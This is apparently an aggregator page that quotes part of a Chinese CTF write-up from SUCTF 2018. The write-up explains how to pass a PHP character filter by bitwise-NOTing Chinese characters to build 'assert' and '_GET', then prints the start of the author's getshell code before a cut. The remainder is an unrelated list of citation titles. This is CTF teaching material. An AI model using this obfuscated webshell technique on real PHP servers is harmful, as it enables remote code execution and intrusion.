【CTF】SUCTF 2018 部分web writeup

'GB2312一级汉字区: 16-55区' tutorial was cited in a 0kami.cn blog article in 2018.

The GB2312一级汉字区: 16-55区 tutorial was cited in a 0kami.cn blog article in 2018.

Subject: 【CTF】SUCTF 2018 部分web writeup
Date: 2018-05-28
Author: SUCTF
Source: https://blog.0kami.cn/2018/05/28/suctf-part-web-writeup/

...
wp
首先确定可用字符,使用bp将所有可见字符暴力一遍后发现可打印字符为$ () [] _ ~ . ;
=,以及其他不可打印字符。

根据p牛的博客,发现取反中文可以起到作用,测试~({中文})发现可根据中文的utf-8编码的中间2个hex码
进行对字母的遍历 http://www.herongyang.com/gb2312_gb/pinyin_32.html

凑出字符assert,_GET,并动态执行。

为了凑出上面的字符,我采用逐个反取反bin2hex(~('a'))获得中文utf-8编码的中间2个,搜表即可找到
对应的中文,写一下我的getshell代码:

<?php
$_=~(瞎);
$__.=$_[[]==[]];
$_=~(挟);
$__.=$_[[]==[]];
$_=~(挟);
$__.=$_[[]==[]];
$_=~(隙);
$__.=$_[[]==[]];
...

Table of Contents

 About This Book

 Reference Citations in 2020

 Reference Citations in 2019

Reference Citations in 2018

 WSDL (วิสเด้าว์) เอกสารส่งข้อมูลของ Web Service (เว็บ เซอร์วิส)

 Properly using .bind() in React...

 XML 파일 보는 방법

 Java Code Examples for java.sql.ResultSet.getAsciiStream()

 Optimized Hybrid Security Model using Base 64 Algorithm

 Locking Rows In MYSQL

 Algoritmat Kriptografike dhe Siguria

 C# (CSharp) RSAPublicKey Examples

 Google Play Games Services works...

【CTF】SUCTF 2018 部分web writeup

 FISCO-BCOS - client.keystore Generation

 Secure Hashing Algorithm

 DARE Algorithm: A New Security Protocol

 SMA CRYPTOGRAPHY ALGORITHM DECRYPT MD5 SOLUTION

 Labeless Part 5: Decrypt Strings in Boleto Banking Malware

 Agregator internetskih radijskih postaja

 openssl 설정 pem 생성 - 프로그래밍 방식으로 SSL 인증서 확인

 security - https - java 서버가 tls 1.2 만 받아들이고

 WSDL 2.0文档示例

 Reference Citations in 2017

 Reference Citations in 2016

 Reference Citations in 2015

 Reference Citations in 2014

 Reference Citations in 2013

 Reference Citations in 2012

 Reference Citations in 2011

 Reference Citations in 2010

 Reference Citations in 2009

 Reference Citations in 2008

 Reference Citations in 2007

 Reference Citations in 2006

 Reference Citations in 2005

 Reference Citations in 2004

 Reference Citations in 2003